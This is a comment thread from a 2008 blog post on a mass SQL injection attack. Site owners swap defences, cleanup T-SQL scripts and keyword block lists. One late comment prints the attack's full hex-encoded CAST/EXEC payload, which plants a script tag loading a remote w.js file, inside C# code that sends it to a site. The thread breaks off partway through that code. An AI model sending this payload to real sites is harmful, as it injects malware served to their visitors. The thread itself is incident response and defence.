]]> By: Radek http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9258 Radek Fri, 25 Jul 2008 17:41:16 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9258 Using CFIF it is a small security against the hack, it gonna filter only those KEYWORDS somebody can come up with other code and you done. What I suggest is if u not using EXECUTE remove it from permissions in DB, and the most important thing is using cfqueryparams: select name from product where productoid= select name from product where variable= For more security ADD MAXLENGHT: select name from product where productoid= select name from product where variable= I know it is time consuming to check all your queries, but here is a great tool to check them and easily fix them and u secured forever !!!! http://qpscanner.riaforge.org/ Very great tool! Using CFIF it is a small security against the hack, it gonna filter only those KEYWORDS somebody can come up with other code and you done. What I suggest is if u not using EXECUTE remove it from permissions in DB, and the most important thing is using cfqueryparams:

select name from product where productoid=

select name from product where variable=

For more security ADD MAXLENGHT:

select name from product where productoid=

select name from product where variable=

I know it is time consuming to check all your queries, but here is a great tool to check them and easily fix them and u secured forever !!!!

http://qpscanner.riaforge.org/

Very great tool!

]]> By: Radek http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9259 Radek Fri, 25 Jul 2008 17:42:45 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9259 The blog is cutting the queries dont know why: "select name from product where productoid=" "select name from product where variable=" For more security ADD MAXLENGHT: "select name from product where productoid=" "select name from product where variable=" The blog is cutting the queries dont know why:

“select name from product where productoid=”

“select name from product where variable=”

For more security ADD MAXLENGHT:

“select name from product where productoid=”

“select name from product where variable=”

]]> By: John Bell http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9263 John Bell Fri, 25 Jul 2008 19:55:19 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9263 I recently recovered from the abc.verynx.com strain. I found the above scripts did not completely clear up my issues. every databases INFORMATION_SCHEMA.COLUMNS table was injected in the DATA_TYPE column. I used a simple find and replace script on that particular field to remove the code from the DATA_TYPE field. perhaps the above removal script can be modified to check this table as well. John Bell I recently recovered from the abc.verynx.com strain. I found the above scripts did not completely clear up my issues. every databases INFORMATION_SCHEMA.COLUMNS table was injected in the DATA_TYPE column. I used a simple find and replace script on that particular field to remove the code from the DATA_TYPE field. perhaps the above removal script can be modified to check this table as well.

John Bell

]]> By: Mark http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9266 Mark Fri, 25 Jul 2008 21:22:31 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9266 Our server was hit by the SQL injection .. Working at an edu our security person refuses to to reattach SQL Server or the webserver ...so i can not scrub the data / The network guys have reloaded the webserver OS and applied the patches... In a SQL Server class i took one guy was suggesting going into SQL server and for the account the webserver is using to attach to the database; with the view sys.sysobjects revoking SELECT access for that user. I have yet to find information that substantiates that mehodology... ps AGHHH Our server was hit by the SQL injection .. Working at an edu our security person refuses to to reattach SQL Server or the webserver …so i can not scrub the data / The network guys have reloaded the webserver OS and applied the patches…
In a SQL Server class i took one guy was suggesting going into SQL server and for the account the webserver is using to attach to the database; with the view sys.sysobjects revoking SELECT access for that user. I have yet to find information that substantiates that mehodology…
ps AGHHH

]]> By: Scott http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9269 Scott Fri, 25 Jul 2008 22:53:16 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9269 We also had a ColdFusion site that was hit with this attack. We got the database cleaned up and used CFQUERYPARAM to stop the attacks. However, I have since noticed reduced performance from the SQL Server. There is also an unexplained increase in the database size. Some of the tables are quite large. I'm guessing that temporarily adding content to the database affected the indexes etc. Does anyone have any ideas as to how to return the database to its former level of efficiency? We also had a ColdFusion site that was hit with this attack. We got the database cleaned up and used CFQUERYPARAM to stop the attacks. However, I have since noticed reduced performance from the SQL Server. There is also an unexplained increase in the database size. Some of the tables are quite large. I’m guessing that temporarily adding content to the database affected the indexes etc. Does anyone have any ideas as to how to return the database to its former level of efficiency?

]]> By: Jason Leveille http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9303 Jason Leveille Sun, 27 Jul 2008 18:20:38 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9303 Thanks for posting this. We have been wrestling with this attack in a classic asp application, and I think we finally have it under control (by finding and filtering all entry points). We'll now be taking a look at execute permissions. Thanks for posting this. We have been wrestling with this attack in a classic asp application, and I think we finally have it under control (by finding and filtering all entry points). We’ll now be taking a look at execute permissions.

]]> By: Jason Leveille http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9319 Jason Leveille Mon, 28 Jul 2008 12:11:04 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9319 Thank you again for this post. At this point we are wondering if steps need to be taken to help our users recover from this attack. As you state, if a user loaded the payload while the server was online a virus would have been installed on their machine. Is there additional information you can provide about the virus? Is there anywhere we can go to learn more information about the virus? You obviously were able to follow the attack to a point where you were able to learn that a virus would be installed. Any insight you could provide would be very helpful. Thank you again for this post. At this point we are wondering if steps need to be taken to help our users recover from this attack. As you state, if a user loaded the payload while the server was online a virus would have been installed on their machine. Is there additional information you can provide about the virus? Is there anywhere we can go to learn more information about the virus? You obviously were able to follow the attack to a point where you were able to learn that a virus would be installed. Any insight you could provide would be very helpful.

]]> By: Nik http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9344 Nik Tue, 29 Jul 2008 13:50:56 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9344 Thanks for the hints about how to remove the threat, we found Ben's suggestion to download the file from http://www.cfprimer.com/downloads.cfm extremely valuable! Thanks for the hints about how to remove the threat, we found Ben’s suggestion to download the file from http://www.cfprimer.com/downloads.cfm extremely valuable!

]]> By: Dr. G. http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9362 Dr. G. Wed, 30 Jul 2008 03:53:01 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9362 my site has been overrun by: "http://abc.verynx.cn/w.js". My webmaster/host-securenet systems says that the hits have not come from his side but from outside and is my responsibility. Now he wants 2,000.00 to fix with all new codes,etc. What shall I do? my site has been overrun by: “http://abc.verynx.cn/w.js”.

My webmaster/host-securenet systems says that the hits have not come from his side but from outside and is my responsibility. Now he wants 2,000.00 to fix with all new codes,etc.

What shall I do?

]]> By: devit http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9369 devit Wed, 30 Jul 2008 12:33:42 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9369 re: Jason Leveille We believe the virus was a worm. It looks like it could be one of the following: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FPOPWIN%2ECK&VSect=P http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FNSPAK%2EAB&VSect=P http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAUTORUN%2ETD&VSect=P http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FSILLY%2EGF&VSect=P We think a full virus scan would detect anything it may have loaded. We've found sometimes if a machine is infected using an online virus scanner such as http://housecall.trendmicro.com can be useful. Hope that helps. re: Jason Leveille

We believe the virus was a worm. It looks like it could be one of the following:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FPOPWIN%2ECK&VSect=P
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FNSPAK%2EAB&VSect=P
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAUTORUN%2ETD&VSect=P
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FSILLY%2EGF&VSect=P

We think a full virus scan would detect anything it may have loaded. We’ve found sometimes if a machine is infected using an online virus scanner such as http://housecall.trendmicro.com can be useful.

Hope that helps.

]]> By: devit http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9370 devit Wed, 30 Jul 2008 12:40:08 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9370 re: Dr. G. Depending when your webmaster created the code you may be able to push back and get at least some of the cost removed. It's obviously very hard to give any type of advice with such little information so we won't even try. What we can comment on is generally there is a warranty period for code. Also you may want to research alternatives such as competitors or try and hold the person who wrote the code accountable for the security problem. Good Luck. re: Dr. G.

Depending when your webmaster created the code you may be able to push back and get at least some of the cost removed. It’s obviously very hard to give any type of advice with such little information so we won’t even try. What we can comment on is generally there is a warranty period for code. Also you may want to research alternatives such as competitors or try and hold the person who wrote the code accountable for the security problem.

Good Luck.

]]> By: Mark http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9401 Mark Thu, 31 Jul 2008 16:19:35 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9401 this has been perhaps proposed as well but here is another method at the database level revoking SELECT access of system level views (within SQL Server) http://dileepstanley.wordpress.com/2008/06/23/prevent-some-of-the-sql-injection-possiblities/ • at the code level we have implemented a sniffer script that looks for common methods (DML functions: SELECT INSERT UPDATE DELETE DROP etc)of attack via FORM and URL variables -- at the server IIS level i have blocked the IPs of sites noted to have possibly propagated injection attacks; while this seems like I am shooting rubber bands at stars [it seems many reference servers in .cn] example of the embedded attack --> script src="w.js" /script script src="abc.verynx.cn/w.js" /script * From Microsoft website "Stop SQL Injection Attacks Before They Stop You" http://msdn.microsoft.com/en-us/magazine/cc163917.aspx this has been perhaps proposed as well but here is another method at the database level revoking SELECT access of system level views (within SQL Server)
http://dileepstanley.wordpress.com/2008/06/23/prevent-some-of-the-sql-injection-possiblities/
• at the code level we have implemented a sniffer script that looks for common methods (DML functions: SELECT INSERT UPDATE DELETE DROP etc)of attack via FORM and URL variables –
at the server IIS level i have blocked the IPs of sites noted to have possibly propagated injection attacks; while this seems like I am shooting rubber bands at stars [it seems many reference servers in .cn] example of the embedded attack –> script src=”w.js” /script script src=”abc.verynx.cn/w.js” /script * From Microsoft website “Stop SQL Injection Attacks Before They Stop You” http://msdn.microsoft.com/en-us/magazine/cc163917.aspx

]]> By: » A SQL Injection attack and search engines | SQL Server Feeds http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9546 » A SQL Injection attack and search engines | SQL Server Feeds Wed, 06 Aug 2008 07:00:30 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9546 [...] Injection attack came up. Here’s a post describing it; it also includes other useful links: http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html A search for the query string “http://1.verynx.cn/w.js” (the quotes are part of the [...] […] Injection attack came up. Here’s a post describing it; it also includes other useful links: http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html A search for the query string “http://1.verynx.cn/w.js” (the quotes are part of the […]

]]> By: Jesse Monson http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9580 Jesse Monson Thu, 07 Aug 2008 21:21:18 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9580 --Try this out if you've been hacked. Run this SQL statement in Query Analyzer. Put the garbage you are trying to remove in the @Offending_String variable DECLARE @Offending_String varchar(4000) DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN SET @Offending_String = '' --Put the string you want cleared in here EXEC('UPDATE ['+@T+'] SET ['+@C+'] = REPLACE(['+@C+'],'+@Offending_String+','''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor –Try this out if you’ve been hacked. Run this SQL statement in Query Analyzer. Put the garbage you are trying to remove in the @Offending_String variable

DECLARE @Offending_String varchar(4000)
DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN

SET @Offending_String = ” –Put the string you want cleared in here
EXEC(’UPDATE [’+@T+’] SET [’+@C+’] = REPLACE([’+@C+’],’+@Offending_String+’,””)’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

]]> By: Troy http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9581 Troy Thu, 07 Aug 2008 22:28:48 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9581 We had the same problem and saw this posting: http://coldfusion.sys-con.com/node/620373 ============================================================================= If you're using ColdFusion, to harden your website from sql injection attacks add the following code to your Application.cfm file. If you're not using ColdFusion, you can translate this code into the language you're using and it should still work. <!--- CREATE SQL REGULAR EXPRESSION---> <!--- CHECK FORM VARIABLES ---> <!--- CHECK URL VARIABLES ---> This code would reside in your Application.cfm file which gets executed every time a ColdFusion file is requested on the server. What it does is it checks all form and URL variables to see if they contain any patterns matching an SQL SELECT, UPDATE, INSERT, DELETE or DROP statement. If a match is found, the user is redirected to a message page indicating that a possible SQL Injection attack was made and the SQL injection is prevented. ============================================================================= I hope this will help. We had the same problem and saw this posting:

http://coldfusion.sys-con.com/node/620373

=============================================================================
If you’re using ColdFusion, to harden your website from sql injection attacks add the following code to your Application.cfm file. If you’re not using ColdFusion, you can translate this code into the language you’re using and it should still work.

This code would reside in your Application.cfm file which gets executed every time a ColdFusion file is requested on the server. What it does is it checks all form and URL variables to see if they contain any patterns matching an SQL SELECT, UPDATE, INSERT, DELETE or DROP statement.

If a match is found, the user is redirected to a message page indicating that a possible SQL Injection attack was made and the SQL injection is prevented.

=============================================================================

I hope this will help.

]]> By: SQL injection using cast / declare attack | Debt Prison http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9621 SQL injection using cast / declare attack | Debt Prison Fri, 08 Aug 2008 13:36:05 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9621 [...] which, so far, seems specific for servers with coldfusion. However, according to a visitor to this article the attack had evolved, effecting MSSQL.  Here’s a sample of the attack string [...] […] which, so far, seems specific for servers with coldfusion. However, according to a visitor to this article the attack had evolved, effecting MSSQL.  Here’s a sample of the attack string […]

]]> By: T.Edge http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9623 T.Edge Fri, 08 Aug 2008 14:00:03 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9623 I found that filtering all special characters in the query string, like any of the following chars: ( ) : ; ' as well as the words select, delete, drop, insert does a good job at sql injection attacks. I get an email like the above (22) comment, plus the user get re-routed to a "blocked.html" page. I will probably add the words declare, cast, char, and exec if it doesn't interfere with the normal operation of my site. My IP blocker code doesn't work with all of these different IP's though, so I'm hoping they will just give up soon. So far, I've been getting slammed for about 6 hours. I found that filtering all special characters in the query string, like any of the following chars: ( ) : ; ‘ as well as the words select, delete, drop, insert does a good job at sql injection attacks. I get an email like the above (22) comment, plus the user get re-routed to a “blocked.html” page. I will probably add the words declare, cast, char, and exec if it doesn’t interfere with the normal operation of my site. My IP blocker code doesn’t work with all of these different IP’s though, so I’m hoping they will just give up soon. So far, I’ve been getting slammed for about 6 hours.

]]> By: EVH http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9631 EVH Fri, 08 Aug 2008 21:07:23 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9631 Thanks for the post - sounds like a lot of people have been getting slammed by these bots recently so the info here is very helpful. One of our ColdFusion sites got hit this week by a SQL injection, but fortunately we were able to restore most of the damaged data from a backup. It was a very large app that was insourced from a former contractor and contained literally thousands of queries with parameters that were all missing cfqueryparam. Although we made efforts to use find/replace to update the code and many previous attacks were trapped, there were unfortunately a few odd places that were missed and one of these was the likely point of entry. In addition to adding cfqueryparam in remaining templates we implemented a custom tag across the whole site that detects the presence of certain SQL keywords in the query string and immediately aborts the request if a match is found. This is a bit kludgy and far from bulletproof, but it at least provides an additional layer of defense and prevents any data from being served or error logging/notification email to occur. Thanks for the post - sounds like a lot of people have been getting slammed by these bots recently so the info here is very helpful.

One of our ColdFusion sites got hit this week by a SQL injection, but fortunately we were able to restore most of the damaged data from a backup. It was a very large app that was insourced from a former contractor and contained literally thousands of queries with parameters that were all missing cfqueryparam. Although we made efforts to use find/replace to update the code and many previous attacks were trapped, there were unfortunately a few odd places that were missed and one of these was the likely point of entry.

In addition to adding cfqueryparam in remaining templates we implemented a custom tag across the whole site that detects the presence of certain SQL keywords in the query string and immediately aborts the request if a match is found. This is a bit kludgy and far from bulletproof, but it at least provides an additional layer of defense and prevents any data from being served or error logging/notification email to occur.

]]> By: loucas http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9641 loucas Sat, 09 Aug 2008 10:37:49 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9641 another band aid for those who have loads of old cf apps to look after http://coldfusion.sys-con.com/node/620373 L another band aid for those who have loads of old cf apps to look after

http://coldfusion.sys-con.com/node/620373

L

]]> By: Fred http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9680 Fred Mon, 11 Aug 2008 05:08:54 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9680 Does anyone have more details on the virus? I've fixed the vulnerabilities, but I know I'm going to get asked what happened before the site was cleaned up. Does anyone have more details on the virus? I’ve fixed the vulnerabilities, but I know I’m going to get asked what happened before the site was cleaned up.

]]> By: S Khosro http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9694 S Khosro Mon, 11 Aug 2008 14:10:45 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9694 Thank you Mark. I used your code in applicaiton.cfm and it is now aborting all attempts. I also added logic to log the IP into a table so that if they try to use another query fromt he same IP its aborted as well. Here is the code snippet. select ip from hacktable where ip ='#trim(remote_addr)#' HACK ATTEMPT RECORDED FROM IP: #remote_addr# #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")# #script_name#&#query_string# insert hacktable (timelogged,siteid,ip) values('#DateFormat(Now(),"MM/DD/YYYY")# #TimeFormat(Now(), "HH:MM:SS")#',2,'#remote_addr#') Thank you Mark. I used your code in applicaiton.cfm and it is now aborting all attempts. I also added logic to log the IP into a table so that if they try to use another query fromt he same IP its aborted as well. Here is the code snippet.

select ip from hacktable where ip =’#trim(remote_addr)#’

HACK ATTEMPT RECORDED FROM IP: #remote_addr#
#DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#
#script_name#&#query_string#

insert hacktable (timelogged,siteid,ip) values(’#DateFormat(Now(),”MM/DD/YYYY”)# #TimeFormat(Now(), “HH:MM:SS”)#’,2,’#remote_addr#’)

]]> By: chris brickhouse http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9745 chris brickhouse Thu, 14 Aug 2008 18:44:30 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9745 this is not just aimed at coldfusion pages. asp is especially vunerable, as is php. i just had an asp.net page hacked to hell every five minutes. i ran this script to reverse it. this script removes all script tags from every text/varchar field in your database. DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update ['+@T+'] set ['+@C+'] = left( convert(varchar(8000), ['+@C+']), len(convert(varchar(8000), ['+@C+'])) - 6 - patindex(''%tpircs''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; this is not just aimed at coldfusion pages. asp is especially vunerable, as is php. i just had an asp.net page hacked to hell every five minutes. i ran this script to reverse it. this script removes all script tags from every text/varchar field in your database.

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = ‘u’ AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
‘update [’+@T+’] set [’+@C+’] = left(
convert(varchar(8000), [’+@C+’]),
len(convert(varchar(8000), [’+@C+’])) - 6 -
patindex(”%tpircs”’
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

]]> By: David http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9949 David Fri, 22 Aug 2008 17:27:41 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9949 Looks like my message got cut off. My question was whether the solution would work for SQL SERVER 2005 or just SQL SERVER 2000? Looks like my message got cut off. My question was whether the solution would work for SQL SERVER 2005 or just SQL SERVER 2000?

]]> By: vabuk http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9970 vabuk Sat, 23 Aug 2008 09:14:19 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-9970 Nice article. But where can i get more about input attack in a search box? thanks Nice article. But where can i get more about input attack in a search box?

thanks

]]> By: Tom39 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-10002 Tom39 Sat, 23 Aug 2008 20:32:58 +0000 http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html#comment-10002 I came across this exploit attempt in my server logs today, and spent the day investigating. While I wasn't negatively impacted by the exploit, one thing is still VERY puzzling to me: Marc Funaro (poster #5 above) indicated that he was able to stop the exploits cold by using ISAPI ReWrite (ISRW) to check for the presence of things like "CAST(4000)" in the URL, etc. I had the same idea, and for some reason, this approach doesn't work on my end -- which is what's puzzling me... (Server is W2K3, IIS6). As a test, I put a ReWrite rule in place to redirect any and all requests to my site to a bogus URL like fofofoxoxoxo.com. I then pointed a browser (both IE and FF) to the URL in question: http://www.mysite.com/Index.htm?'DECLARE%20@S%20CHAR(4000)...EXEC(@S); The browsers each sat there for a few minutes, and then timed out. Odd. I chopped the URL down to only: http://www.mysite.com/Index.htm?'DECLARE%20@S%20CHAR(4000) and I was redirected as per my ISRW rule. My next thought was that perhaps the browsers were getting tripped up with the multiple @ signs in there, trying to resolve some other IP address using the long 0x... CAST as the address. So, I then whipped up a quick C# program to perform the GET requests and dump back the output. Now things got VERY strange... With the ISRW rule in place still redirecting ALL requests to mysite.com to fofofoxoxo.com, sending the SQL injection request via my C# app still caused the request to timeout, as if something on the server was trying to do something with the request before any of the ISAPI filters. I confirmed that ISAPI_REWRITE was the first filter in the execution chain, and it was(is). So -- what the heck is the server doing with the request? I continued to send variations of the SQL inject string to the server, including: * One in which I changed CAST to XAST and EXEC to QXEC. Everything else was the same. This request did NOT timeout on the server! * One in which I changed the contents of the CAST(...) from 0x4445435... to 0x11111... (same length data). This request did NOT timeout on the server! * Several in which I progressively chopped pieces off the end of the CAST(...) data. After the string got sufficiently short (the exact length, I don't recall), these requests stopped timing out on the server. All of this has left me quite puzzled. With ISAPI_REWRITE being the first filter in my list, what exactly is going on on the server end that causes the request to timeout for the SQL inject request in question? Even with a rule in place to redirect ALL requests elsewhere, some requests (like the SQL inject) never get processed. WHY? What is going on? For reference, here is the C# source for those interested in trying it themselves (replace mysite.com with your own site.) ---- using System; using System.Net.Sockets; public class Client { static public void pause() { Console.WriteLine( "\r\n***** Done *****\r\n" ); Console.ReadKey(); } static public void Main(string[] Args) { TcpClient socketForServer; try { socketForServer = new TcpClient("www.mysite.com", 80); } catch { Console.WriteLine("Failed to connect to server at {0}:999", "mysite.com"); pause(); return; } NetworkStream networkStream = socketForServer.GetStream(); System.IO.StreamReader streamReader = new System.IO.StreamReader(networkStream); System.IO.StreamWriter streamWriter = new System.IO.StreamWriter(networkStream); try { string outputString; // read the data from the host and display it { //streamWriter.WriteLine("GET / HTTP/1.1\r\nHost: www.mysite.com\r\n\r\n"); //SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292 //C40432076617263686172283430303029204445434C415245205461626C655F437 //572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6 //E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732 //06220776865726520612E69643D622E696420616E6420612E78747970653D27752 //720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7 //220622E78747970653D323331206F7220622E78747970653D31363729204F50454 //E205461626C655F437572736F72204645544348204E4558542046524F4D2020546 //1626C655F437572736F7220494E544F2040542C4043205748494C4528404046455 //443485F5354415455533D302920424547494E20657865632827757064617465205 //B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B27272 //23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F616263 //2E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272 //0776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746 //C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782 //E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204 //E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404 //320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415 //445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); // Hangs: //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41 //5245204054207661726368617228323535292C4043207661726368617228343030 //3029204445434C415245205461626C655F437572736F7220435552534F5220464F //522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62 //6A6563747320612C737973636F6C756D6E73206220776865726520612E69643D62 //2E696420616E6420612E78747970653D27752720616E642028622E78747970653D //3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F //7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 //4645544348204E4558542046524F4D20205461626C655F437572736F7220494E54 //4F2040542C4043205748494C4528404046455443485F5354415455533D30292042 //4547494E20657865632827757064617465205B272B40542B275D20736574205B27 //2B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269 //7074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73 //223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F //74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22 //687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F73637269 //70743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6 //55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626 //C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 //%20AS%20CHAR(4000));EXEC(@S);"; // Does not hang: //String inject_str = "GET /Index.htm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4 //15245204054207661726368617228323535292C4043207661726AS%20CHAR(4000));"; // Does not hang, despite being same length as the long query above. //String inject_str = "GET /Index.htm?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 